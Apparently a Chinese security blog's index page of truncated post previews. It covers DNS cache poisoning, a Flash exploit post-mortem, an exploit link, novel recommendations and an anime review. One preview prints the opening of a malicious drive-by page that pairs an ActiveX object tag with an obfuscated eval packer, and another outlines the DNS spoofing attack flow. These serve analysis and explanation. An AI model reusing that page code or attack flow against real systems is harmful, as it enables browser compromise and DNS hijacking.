权当科普了，现在很多人对这个漏洞褒贬不一，有认为鸡肋的，也有认为危害大的，我个人的认为是实现攻击是比较困难，但是一旦攻击成功危害非常大，如果你有耐心也许暴力猜测一个月，可能会被你猜测到一个TXID。
现在这个攻击方法的流程大致已经明白了， 比如你要欺骗某个DNS服务器上yahoo.com所有的域名，先向是向服务器请求一个随机的子域名，例如0x5570x5570x557.yahoo.com，由于这个子域名其实是不存在的，所以没有被cache，dns服务器会立即向这个域名的NS服务器查询这个子域名的ip地址，这个时候你就可以伪造这个回复包了，在伪

（个人的一点点理解，如有错误请指正）
Metasploit终于放出了这个DNS poisoning的代码了，对于这个漏洞用poisoning代替spoof再恰当不过了，大家可以用ARP poisoning的原理来理解这个漏洞，attack首先向target DNS服务器解析某个不存在的子域名，DNS如果配置成forward就会向这个域名的authority server发送一个查询包来获取这个域名的ip地址，然后攻击者快速的伪造authority server回应一个包，把这个域名解析到我们想要的ip地址，在攻击代码里面，每发送一个查询包后紧接着就会发送10个伪造的包。听起来似乎很简单，其实实际操作起

《龙蛇演义》现代武侠类的小说，写的比较不错和《道士下山》中功夫的描写比较相似。
《三洞真诠》算是比较'写实'的仙侠小说，作者对道家体系非常了解，其中内丹，符箓，法术乃至斋醮科仪都非常的写实，应该也是信道之人。
《人欲》老徐的人鬼神三部曲的最后一部，必看。
《凡人修仙传》传统的仙侠类小说，属于比较耐看的那种，境界都比较慢但是也要比《寻妖》快一点。
《盘龙》西方玄幻类的小说，作者的前面2本书根本看不下去，但是这本还是能看一点下去。
《卡徒》方想继《师士传说》后的新玄幻小说，不错，推荐一

看到pete大师在irc里面说的，尝试用ie打开了一下，VSE狂报警。
初步看是针对Access activeX下载执行和Flash 这两个漏洞的挂马。
ofc.htm:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=

Pwnie Awards 安全界的"奥斯卡颁奖"，关于去年的获奖情况可以参考Pwnie Awards 2007。今年的颁奖也在即，在下斗

http://code.google.com/p/chtml/

比汉编强多了...

http://seclists.org/dailydave/2008/q3/0000.html

http://lul-disclosure.net/exploits/openbsdjizz.c

http://lul-disclosure.net/lulz/openbsdjizz-the_movie.html

来看看这个本地提升权限的漏洞。


不过要调用AppScripts得在console login以后才行，虽然如此也不足以忽略这个漏洞的弱智，换作时下流行的话就是“太挫了！”。

有不少朋友一直怂恿我写这么一个马后炮分析的文章，也拖了好久，现在放出来了。


首先感谢Mark Dowd发现这个漏洞并且分享了一些关于这个漏洞通用利用的方法。

再阅读这篇blog之前，请熟读Mark Dowd关于Flash exploit的whitepaper和Flash 9文件格式以及Adobe关于AVM2的详细文档。先简单的回顾一下flash文件格式，一个SWF文件是由SWF header和若干tag来组成的。

SWF Header Format

也许你也有曾经相似的经历，也许有你以前的片段。往往最后的，不是自己曾经所预料的，因为有太多太多的意外。看完这部《秒速5センチメートル》，也许你也会有我一样的感触，Move on，一切都会是美好的回忆，只是有一点点伤感，还有一些些心酸。